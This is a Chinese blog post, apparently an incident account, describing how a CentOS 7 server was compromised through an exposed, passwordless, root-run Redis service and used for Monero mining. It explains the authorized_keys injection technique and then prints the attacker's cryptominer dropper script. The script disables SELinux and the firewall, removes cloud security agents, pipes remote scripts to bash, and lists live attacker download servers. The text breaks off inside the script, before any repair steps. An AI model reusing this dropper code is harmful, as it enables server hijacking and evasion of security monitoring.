记一次CentOS7因Redis配置不当导致被Root提权沦为矿机修复过程
未曾想過,那些年影視劇中黑客們的精彩橋段,竟在2020這個充滿魔幻的年份,變成了現實。
前幾日傍晚突然收到了來自阿里云安全中心的提醒,服務器疑似受到攻擊了。想不到我那用作學習的機器,有朝一日竟然淪為礦機。剛買完晚餐的我,突然就覺得手里的吃的不香了。打開手機試著訪問自己的項目網站 ,果然,連接不上了。根據云安全的提示,對可疑的進程使用kill命令直接結束。但阿里云平臺仍然不斷提醒我警報未消除,嘗試去查 “載荷投遞” 卻一無所獲。服務器也一度因為端口惡意掃描而被多次阻斷,看著一個個警告信息但卻束手無策,便不由得想放棄。而一想到自己的相關的數據文件全在服務器上,又繼續探尋下去,兜兜轉轉查看好多資料后才逐漸了解到,服務器中了挖礦病毒。攻擊者通過Redis服務配置不當的漏洞,入侵服務器后放置腳本,其目的是利用服務器資源來挖礦,并且腳本自帶端口掃描會對周圍服務器進行檢測,繼續尋找新的宿主機嘗試入侵(因為腳本不斷惡意掃描端口,被阿里云安全平臺阻斷端口訪問),進而獲取更多的礦機,而開采門羅幣則是需要很多的服務器資源,因此也不足為奇了。
攻擊原理
由于服務器Redis服務監聽了公網端口未設置訪問密碼并且其進程啟動時使用了root用戶,攻擊者可遠程登錄到Redis中,通過Redis內置的命令將自己的公鑰寫入到/root/.ssh/authorized_keys文件夾下,進而可以直接免密登錄到服務器上,并在服務器中植入惡意腳本,實現利用服務器挖礦操作。
腳本分析
通過攻擊者服務器獲取的腳本init.sh文件如下
#!/bin/sh setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null sync && echo 3 >/proc/sys/vm/drop_caches crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/zzhs rtdir="/etc/zzhs" bbdir="/usr/bin/curl" bbdira="/usr/bin/cd1" ccdir="/usr/bin/wget" ccdira="/usr/bin/wd1" mv /usr/bin/curl /usr/bin/url mv /usr/bin/url /usr/bin/cd1 mv /usr/bin/wget /usr/bin/get mv /usr/bin/get /usr/bin/wd1 ulimit -n 65535 rm -rf /var/log/syslog chattr -iua /tmp/ chattr -iua /var/tmp/ ufw disable iptables -F #sudo sysctl kernel.nmi_watchdog=0 echo '0' >/proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf userdel akay userdel vfinder rm -rf /tmp/addres* rm -rf /tmp/walle* rm -rf /tmp/keys if ps aux | grep -i '[a]liyun'; then$bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash$bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash$bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash$bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bashpkill aliyun-servicerm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-servicerm -rf /usr/local/aegis*systemctl stop aliyun.servicesystemctl disable aliyun.serviceservice bcm-agent stopyum remove bcm-agent -yapt-get remove bcm-agent -y elif ps aux | grep -i '[y]unjing'; then/usr/local/qcloud/stargate/admin/uninstall.sh/usr/local/qcloud/YunJing/uninst.sh/usr/local/qcloud/monitor/barad/admin/uninstall.sh fiminer_url="http://39.100.33.209/b2f628/zzh" miner_url_backup="http://47.253.42.213/b2f628/zzh" miner_size="7600464" sh_url="http://39.100.33.209/b2f628/newinit.sh" sh_url_backup="http://47.253.42.213/b2f628/newinit.sh" config_url="http://39.100.33.209/b2f628/config.json" config_url_backup="http://47.253.42.213/b2f628/config.json" config_size="2732" chattr_size="8000" #scan_url="http://103.125.218.107/b2f628/svcworkmanager" #scan_url_backup="http://45.9.148.37/b2f628fff19fda999999999/svcworkmanager" #scan_size="1919056" #watchdog_url="http://103.125.218.107/b2f628/svcguard" #watchdog_url_backup="http://45.9.148.37/b2f628fff19fda999999999/svcguard" #watchdog_size="1472136" #$bbdira -fsSL http://103.125.218.107/b2f628/iplog.php 2>/dev/null #$bbdir -fsSL http://45.9.148.37/b2f628fff19fda999999999/iplog.php 2>/dev/null #$ccdira http://103.125.218.107/b2f628/iplog.php -O /tmp/.null 2>/dev/null #$ccdir http://45.9.148.37/b2f628fff19fda999999999/iplog.php -O /tmp/.null 2>/dev/null rm -f /tmp/.null 2>/dev/nullecho 128 > /proc/sys/vm/nr_hugepages sysctl -w vm.nr_hugepages=128kill_miner_proc() { netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 % netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 % netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'svc' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 % #ps aux | grep -v grep | grep -v root | grep -v dblaunch | grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd | grep -v kdevtmpfsi | awk '$3>80.0{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 % netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 % pgrep -f xzpauectgr | xargs -I % kill -9 % pgrep -f slxfbkmxtd | xargs -I % kill -9 % pgrep -f mixtape | xargs -I % kill -9 % pgrep -f addnj | xargs -I % kill -9 % pgrep -f 200.68.17.196 | xargs -I % kill -9 % pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 % pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 % pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 % pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 % pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 % pgrep -f honvbsasbf.conf | xargs -I % kill -9 % pgrep -f mqdsflm.cf | xargs -I % kill -9 % pgrep -f lower.sh | xargs -I % kill -9 % pgrep -f ./ppp | xargs -I % kill -9 % pgrep -f cryptonight | xargs -I % kill -9 % pgrep -f ./seervceaess | xargs -I % kill -9 % pgrep -f ./servceaess | xargs -I % kill -9 % pgrep -f ./servceas | xargs -I % kill -9 % pgrep -f ./servcesa | xargs -I % kill -9 % pgrep -f ./vsp | xargs -I % kill -9 % pgrep -f ./jvs | xargs -I % kill -9 % pgrep -f ./pvv | xargs -I % kill -9 % pgrep -f ./vpp | xargs -I % kill -9 % pgrep -f ./pces | xargs -I % kill -9 % pgrep -f ./rspce | xargs -I % kill -9 % pgrep -f ./haveged | xargs -I % kill -9 % pgrep -f ./jiba | xargs -I % kill -9 % pgrep -f ./watchbog | xargs -I % kill -9 % pgrep -f ./A7mA5gb | xargs -I % kill -9 % pgrep -f kacpi_svc | xargs -I % kill -9 % pgrep -f kswap_svc | xargs -I % kill -9 % pgrep -f kauditd_svc | xargs -I % kill -9 % pgrep -f kpsmoused_svc | xargs -I % kill -9 % pgrep -f kseriod_svc | xargs -I % kill -9 % pgrep -f kthreadd_svc | xargs -I % kill -9 % pgrep -f ksoftirqd_svc | xargs -I % kill -9 % pgrep -f kintegrityd_svc | xargs -I % kill -9 % pgrep -f jawa | xargs -I % kill -9 % pgrep -f oracle.jpg | xargs -I % kill -9 % pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 % pgrep -f 188.209.49.54 | xargs -I % kill -9 % pgrep -f 181.214.87.241 | xargs -I % kill -9 % pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 % pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 % pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 % pgrep -f servim | xargs -I % kill -9 % pgrep -f kblockd_svc | xargs -I % kill -9 % pgrep -f native_svc | xargs -I % kill -9 % pgrep -f ynn | xargs -I % kill -9 % pgrep -f 65ccEJ7 | xargs -I % kill -9 % pgrep -f jmxx | xargs -I % kill -9 % pgrep -f 2Ne80nA | xargs -I % kill -9 % pgrep -f sysstats | xargs -I % kill -9 % pgrep -f systemxlv | xargs -I % kill -9 % pgrep -f watchbog | xargs -I % kill -9 % pgrep -f OIcJi1m | xargs -I % kill -9 % pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f XJnRj pkill -f mgwsl pkill -f pythno pkill -f jweri pkill -f lx26 pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f polkitd pkill -f nanoWatch pkill -f zigw pkill -f devtool pkill -f devtools pkill -f systemctI pkill -f watchbog pkill -f cryptonight pkill -f sustes pkill -f xmrig pkill -f xmrig-cpu pkill -f 121.42.151.137 pkill -f init12.cfg pkill -f nginxk pkill -f tmp/wc.conf pkill -f xmrig-notls pkill -f xmr-stak pkill -f suppoie pkill -f zer0day.ru pkill -f dbus-daemon--system pkill -f nullcrew pkill -f systemctI pkill -f kworkerds pkill -f init10.cfg pkill -f /wl.conf pkill -f crond64 pkill -f sustse pkill -f vmlinuz pkill -f exin pkill -f apachiii pkill -f svcworkmanager pkill -f xr pkill -f trace pkill -f svcupdate rm -rf /usr/bin/config.json rm -rf /usr/bin/exin rm -rf /tmp/wc.conf rm -rf /tmp/log_rot rm -rf /tmp/apachiii rm -rf /tmp/sustse rm -rf /tmp/php rm -rf /tmp/p2.conf rm -rf /tmp/pprt rm -rf /tmp/ppol rm -rf /tmp/javax/config.sh rm -rf /tmp/javax/sshd2 rm -rf /tmp/.profile rm -rf /tmp/1.so rm -rf /tmp/kworkerds rm -rf /tmp/kworkerds3 rm -rf /tmp/kworkerdssx rm -rf /tmp/xd.json rm -rf /tmp/syslogd rm -rf /tmp/syslogdb rm -rf /tmp/65ccEJ7 rm -rf /tmp/jmxx rm -rf /tmp/2Ne80nA rm -rf /tmp/dl rm -rf /tmp/ddg rm -rf /tmp/systemxlv rm -rf /tmp/systemctI rm -rf /tmp/.abc rm -rf /tmp/osw.hb rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/.java rm -rf /tmp/.omed rm -rf /tmp/.tmpc rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/gates.lod rm -rf /tmp/conf.n rm -rf /tmp/devtool rm -rf /tmp/devtools rm -rf /tmp/fs rm -rf /tmp/.rod rm -rf /tmp/.rod.tgz rm -rf /tmp/.rod.tgz.1 rm -rf /tmp/.rod.tgz.2 rm -rf /tmp/.mer rm -rf /tmp/.mer.tgz rm -rf /tmp/.mer.tgz.1 rm -rf /tmp/.hod rm -rf /tmp/.hod.tgz rm -rf /tmp/.hod.tgz.1 rm -rf /tmp/84Onmce rm -rf /tmp/C4iLM4L rm -rf /tmp/lilpip rm -rf /tmp/3lmigMo rm -rf /tmp/am8jmBP rm -rf /tmp/tmp.txt rm -rf /tmp/baby rm -rf /tmp/.lib rm -rf /tmp/systemd rm -rf /tmp/lib.tar.gz rm -rf /tmp/baby rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.mynews1234 rm -rf /tmp/a3e12d rm -rf /tmp/.pt rm -rf /tmp/.pt.tgz rm -rf /tmp/.pt.tgz.1 rm -rf /tmp/go rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.tmpnewasss rm -rf /tmp/java rm -rf /tmp/go.sh rm -rf /tmp/go2.sh rm -rf /tmp/khugepageds rm -rf /tmp/.censusqqqqqqqqq rm -rf /tmp/.kerberods rm -rf /tmp/kerberods rm -rf /tmp/seasame rm -rf /tmp/touch rm -rf /tmp/.p rm -rf /tmp/runtime2.sh rm -rf /tmp/runtime.sh rm -rf /dev/shm/z3.sh rm -rf /dev/shm/z2.sh rm -rf /dev/shm/.scr rm -rf /dev/shm/.kerberods rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so chattr -i /etc/ld.so.preload rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so rm -rf /tmp/watchdogs rm -rf /etc/cron.d/tomcat rm -rf /etc/rc.d/init.d/watchdogs rm -rf /usr/sbin/watchdogs rm -f /tmp/kthrotlds rm -f /etc/rc.d/init.d/kthrotlds rm -rf /tmp/.sysbabyuuuuu12 rm -rf /tmp/logo9.jpg rm -rf /tmp/miner.sh rm -rf /tmp/nullcrew rm -rf /tmp/proc rm -rf /tmp/2.sh rm /opt/atlassian/confluence/bin/1.sh rm /opt/atlassian/confluence/bin/1.sh.1 rm /opt/atlassian/confluence/bin/1.sh.2 rm /opt/atlassian/confluence/bin/1.sh.3 rm /opt/atlassian/confluence/bin/3.sh rm /opt/atlassian/confluence/bin/3.sh.1 rm /opt/atlassian/confluence/bin/3.sh.2 rm /opt/atlassian/confluence/bin/3.sh.3 rm -rf /var/tmp/f41 rm -rf /var/tmp/2.sh rm -rf /var/tmp/config.json rm -rf /var/tmp/xmrig rm -rf /var/tmp/1.so rm -rf /var/tmp/kworkerds3 rm -rf /var/tmp/kworkerdssx rm -rf /var/tmp/kworkerds rm -rf /var/tmp/wc.conf rm -rf /var/tmp/nadezhda. rm -rf /var/tmp/nadezhda.arm rm -rf /var/tmp/nadezhda.arm.1 rm -rf /var/tmp/nadezhda.arm.2 rm -rf /var/tmp/nadezhda.x86_64 rm -rf /var/tmp/nadezhda.x86_64.1 rm -rf /var/tmp/nadezhda.x86_64.2 rm -rf /var/tmp/sustse3 rm -rf /var/tmp/sustse rm -rf /var/tmp/moneroocean/ rm -rf /var/tmp/devtool rm -rf /var/tmp/devtools rm -rf /var/tmp/play.sh rm -rf /var/tmp/systemctI rm -rf /var/tmp/.java rm -rf /var/tmp/1.sh rm -rf /var/tmp/conf.n rm -r /var/tmp/lib rm -r /var/tmp/.lib chattr -iau /tmp/lok chmod +700 /tmp/lok rm -rf /tmp/lok sleep 1 chattr -i /tmp/kdevtmpfsi echo 1 > /tmp/kdevtmpfsi chattr +i /tmp/kdevtmpfsi sleep 1 chattr -i /tmp/redis2 echo 1 > /tmp/redis2 chattr +i /tmp/redis2 chattr -ia /.Xll/xr >/.Xll/xr chattr +ia /.Xll/xr chattr -ia /etc/trace >/etc/trace chattr +ia /etc/trace chattr -ia /etc/newsvc.sh chattr -ia /etc/svc* chattr -ia /tmp/newsvc.sh chattr -ia /tmp/svc* >/etc/newsvc.sh >/etc/svcupdate >/etc/svcguard >/etc/svcworkmanager 